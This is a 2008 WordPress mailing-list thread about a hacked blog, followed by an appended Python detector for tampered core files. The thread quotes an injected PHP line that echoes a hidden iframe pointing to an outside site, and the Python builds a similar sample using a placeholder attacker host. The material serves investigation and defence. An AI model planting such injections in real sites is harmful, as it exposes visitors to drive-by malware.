[wp-hackers] Re: XSS vuln in wordpress 2.7 ?

madalin niladam at gmail.com
Mon Dec 22 22:40:16 GMT 2008


Kim.

Thanks a lot, I'll try them right away.


On Tue, Dec 23, 2008 at 12:32 AM, Kim Parsell <kparsell-wp at kpdesign.net> wrote:
> madalin -
> I'm going to suggest 2 plugins for you to look into using:
>
> WordPress Exploit Scanner (Donncha O Caoimh):
> http://wordpress.org/extend/plugins/exploit-scanner/
>
> postlogger for WordPress:
> http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/
>
> I run postlogger, and it's very interesting the things that it logs that
> regular access logs don't. Not saying it would have caught this intruder,
> but you might find other interesting things going on that you're not aware
> of that you can block.
>
> The Exploit Scanner might let you know if there's a vulnerability in a
> plugin or anywhere else in your WordPress install.
>
> Kim
>
> -------------------------
>
> baker wrote:
>>
>> Just to chime in on the fun, you're not the only one as a quick google
>> search pulls a lot of people with similar posts.
>>
>> http://www.networksolutions.com/whois-search/thedeadpit.com
>>
>> It also shows the (supposed) owner is in Estonia, which oddly enough
>> I've seen a lot of failed hack attempts on my site coming from Estonia
>> (I think, maybe it was Algeria?)
>>
>> Do you have mod_security enabled? No luck on pulling down the
>> offender's IP, and the site itself seems to do nothing but host a
>> virus...
>>
>> Best of luck turning this around...
>>
>> -kb
>>
>>>
>>> ------------------------------
>>>
>>> Message: 7
>>> Date: Mon, 22 Dec 2008 20:39:49 +0200
>>> From: madalin <niladam at gmail.com>
>>> Subject: Re: [wp-hackers] XSS vuln in wordpress 2.7 ?
>>> To: wp-hackers at lists.automattic.com
>>> Message-ID:
>>>       <df809b110812221039y29f116f1k5238dfb209d3f30a at mail.gmail.com>
>>> Content-Type: text/plain; charset=UTF-8
>>>
>>> Yes, that's exactly what I am saying. Here is my index.php:
>>>
>>> <?php
>>> /**
>>>  * Front to the WordPress application. This file doesn't do anything, but loads
>>>  * wp-blog-header.php which does and tells WordPress to load the theme.
>>>  *
>>>  * @package WordPress
>>>  */
>>>
>>> /**
>>>  * Tells WordPress to load the WordPress theme and output it.
>>>  *
>>>  * @var bool
>>>  */
>>> define('WP_USE_THEMES', true);
>>>
>>> /** Loads the WordPress Environment and Template */
>>> require('./wp-blog-header.php');
>>>
>>> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> ?>
>>>
>>> I've commented out the line so I can keep it for future investigation.
>>>
>>> Our passwords have NOT been compromised, as the only logins are from my
>>> host and my friend's host. It could be an older version of a plugin
>>> though.
>>>
>>> However, I had to report this as maybe someone will encounter the same
>>> problem or so.
>>>
>>> Thanks.
>>>
>>> On Mon, Dec 22, 2008 at 8:36 PM, Stephen Rider
>>> <wp-hackers at striderweb.com> wrote:
>>>
>>>>
>>>> Well, wait.  he said:  "i found [it in] my blog's index.php (not theme's
>>>> index.php)"
>>>>
>>>> Does this mean it shows up in the final rendered page, but not in the
>>>> theme's file?  In that case, it's being added dynamically.  The link is not
>>>> written in the theme.
>>>>
>>>> Just trying to clarify.  I'm no security guru... (IANASG)
>>>>
>>>> Stephen
>>>>
>>>> On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
>>>>
>>>>>
>>>>> If the file is writable for the webserver and file access is enabled on
>>>>> the webserver: yes.
>>>>> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>>>>>
>>>>>>
>>>>>> Wow. That's nasty, and malicious. Could a plugin do that?
>>>>>>
>>>>>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>>>>>
>>>>>>>
>>>>>>> For some reason I found my blog's index.php (not theme's index.php)
>>>>>>> with the following piece of code right before the ?>
>>>>>>>
>>>>>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>>>>>>
>>>>>>> I tried looking at the logs. No luck. The file's permissions look like
>>>>>>> this:
>>>>>>>
>>>>>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
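A defender-side check for the kind of tampering this thread describes (a hidden iframe echoed from a modified core index.php, and Joost's point that the file is only at risk if the webserver can write it), as an added Python example that is not code from the thread or from the plugins Kim recommends. The trimmed reference copy of index.php, the placeholder URL and the numeric uid/gid values are assumptions made for the example.

```python
import difflib
import re
import stat

# Reference copy of WordPress 2.7 index.php as quoted in the thread (doc comments
# shortened); a real check would diff against a pristine download of the same version.
STOCK_INDEX_PHP = """<?php
/** Front to the WordPress application; loads wp-blog-header.php. */
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>
"""

# Constructed tampered copy: one echo line injected before the closing ?>.
# The URL is a placeholder, not the domain mentioned in the thread.
TAMPERED_INDEX_PHP = STOCK_INDEX_PHP.replace(
    "?>\n",
    'echo "<iframe src=\\"http://attacker.example/?click=1\\" width=1 '
    'height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";\n?>\n',
)

# A 1x1 or visibility:hidden iframe is the usual shape of a drive-by injection.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(visibility\s*:\s*hidden|width=\\?\"?[01]\b|height=\\?\"?[01]\b)",
    re.IGNORECASE,
)

def lines_added_vs_stock(stock, actual):
    """Lines in the installed file that the reference copy does not contain."""
    diff = difflib.unified_diff(stock.splitlines(), actual.splitlines(),
                                lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]

def suspicious_output_lines(php_source):
    """(line number, text) of echo/print statements that emit a hidden iframe."""
    return [(no, line.strip())
            for no, line in enumerate(php_source.splitlines(), 1)
            if re.search(r"\b(echo|print)\b", line) and HIDDEN_IFRAME.search(line)]

def writable_by_web_user(mode, uid, gid, web_uid, web_gids):
    """Can a PHP process running as web_uid write the file? The thread's
    -rw-r--r-- madalin:madalin is safe only if PHP does not run as madalin."""
    if uid == web_uid:
        return bool(mode & stat.S_IWUSR)
    if gid in web_gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)
```

On shared hosts that run PHP as the account owner (suPHP/suexec style), a 644 file owned by that account is writable by any compromised plugin, which is the case Joost's reply points at.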